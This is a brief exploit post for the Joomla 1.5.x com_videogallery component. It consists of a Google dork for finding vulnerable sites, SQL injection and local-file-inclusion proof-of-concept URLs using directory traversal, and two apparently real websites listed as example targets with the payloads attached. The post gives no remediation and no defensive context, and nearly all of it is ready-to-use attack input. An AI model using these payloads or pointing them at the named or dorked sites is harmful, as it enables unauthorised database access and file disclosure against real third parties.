Joomla com_videogallery (SQLi/LFI) Multiple Vulnerabilites

Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)

--------------------------------------------------------------------------

# Google-Dork : ( allinurl:option=com_videogallery ) ' YoU_Upi N0ob's

# Exploit/p0c :

 SQL Inj3ction >

http://[Target]/index.php?option=com_videogallery&Itemid=68'
http://[Target]/index.php?option=com_videogallery&Itemid=[id]' [ SQLi Here ]--

 Local File Include p0c >

http://[Target]/&controller=../../../../../../../../../../../../[LFI]

# About Vulners .. work just on joomla 1.5.x com_videogallery

# CONTOH WEB

http://www.zilog.com/index.php?option=com_videogallery&Itemid=68%27
http://www.biarritzeko.com/index.php?option=com_videogallery&controller=../../../../../../../../../../../../[LFI]